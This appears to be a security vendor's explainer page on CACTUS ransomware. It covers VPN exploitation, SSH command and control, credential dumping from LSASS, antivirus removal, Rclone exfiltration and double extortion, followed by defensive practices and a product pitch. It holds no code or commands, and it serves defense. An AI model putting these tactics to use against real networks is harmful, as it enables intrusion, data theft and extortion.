CACTUS Ransomware

CACTUS ransomware is a malware strain that was first discovered in the wild in March 2023. Its name is based on the ransom note that it places on victims’ computers, which is named cAcTuS.readme.txt. The malware also creates encrypted files with the .cts1 extension, where the number at the end of the extension can vary.

Request a Demo Learn More

How Does CACTUS Ransomware Work?

CACTUS ransomware usually exploits vulnerabilities in virtual private network (VPN) software to gain access to a target environment. After gaining access to the system, the malware establishes command and control (C2) communications with its operator via SSH. It also takes advantage of Scheduled Tasks on the infected system to maintain persistence across reboots.

With a footprint on the target network, the malware uses network scanning to identify potential targets for infection on the network. It then uses various methods to steal user credentials, such as collecting them from web browsers and dumping them from LSASS. These compromised credentials are then used to gain the required level of access to perform the attack. This includes adding or accessing accounts on remote devices that the malware can use to spread itself through the network.

 

Once on a device, the malware uses msiexec to uninstall common antivirus software. The malware also incorporates various techniques designed to protect it against detection, including the distribution of the malware in an encrypted form that requires an AES key to unpack. This technique is likely designed to protect against analysis of the malware since researchers and sandboxes may not have collected the appropriate decryption key alongside their copy of the malware or are unaware of the configuration parameters required to trigger its malicious functionality.

CACTUS is an example of a double-extortion ransomware variant. In addition to encrypting data — with a combination of RSA and AES — the malware also attempts to exfiltrate it. It has been observed to use Rclone for this, which moves stolen files to cloud storage. Once encryption and exfiltration are complete, the malware posts ransom notes on the user’s computer.

What Does CACTUS Ransomware Target?

CACTUS ransomware uses known VPN vulnerabilities to gain access to its victims, which limits its pool of potential targets to those organizations using known vulnerable VPN appliances. Additionally, CACTUS has primarily been observed to target large enterprises, which have the resources required to meet a large ransom request.

How to Protect Against CACTUS Ransomware

CACTUS is an example of a ransomware variant designed to attack corporate networks while using various evasion techniques to fly under the radar. Some security best practices that organizations can implement to protect against this threat include:

  • Patch Management: CACTUS ransomware primarily infects systems by exploiting known vulnerabilities in unpatched VPN systems. Promptly applying updates and patches when they become available can prevent the malware from using this access vector.
  • Strong Authentication: This ransomware often attempts to steal credentials from browsers and LSASS to gain the access and privileges necessary to carry out its objectives. Implementing multi-factor authentication (MFA) for user accounts can prevent CACTUS from using the passwords it steals from an infected computer.
  • Employee Education: CACTUS attempts to exploit password reuse by dumping passwords from various sources on an infected computer. Training employees on account security best practices can help to reduce or eliminate this threat.
  • Network Segmentation: CACTUS attempts to move laterally through the network by using accounts that it created or compromised from an infected computer. Network segmentation isolates high-value systems from the rest of the network, making them more difficult for an attacker to access.
  • Network Security: This ransomware uses network scanning and remote access tools to move through the network. Network monitoring and security solutions can identify and block these attempts at lateral movement.
  • Anti-Ransomware Solutions: CACTUS attempts to encrypt sensitive files and exfiltrate them via cloud storage. Anti-ransomware solutions can identify this malicious behavior and eradicate the malware infection.

Prevent Ransomware Attacks with Check Point

Ransomware has become one of the most significant threats to organizations’ data, reputation, and bottom line. The modern ransomware attack not only threatens access to data via encryption but also incorporates data theft and shaming to increase the pressure on organizations to pay the demanded ransom.

However, ransomware like CACTUS is only one of several cybersecurity threats that companies face. To learn more about the extent of the current cyber threat landscape, check out Check Point’s 2024 Cyber Security Report.

 

Check Point Harmony Endpoint offers organizations the tools that they need to protect against ransomware and other potential threats to their endpoints and data. Its prevention-focused approach to security is designed to identify and eradicate the threat before it can encrypt or leak sensitive data. To learn more about Harmony Endpoint’s capabilities and how it can enhance your organization’s defenses against ransomware, request a free demo.

×
  Feedback
This website uses cookies for its functionality and for analytics and marketing purposes. By continuing to use this website, you agree to the use of cookies. For more information, please read our Cookies Notice.
OK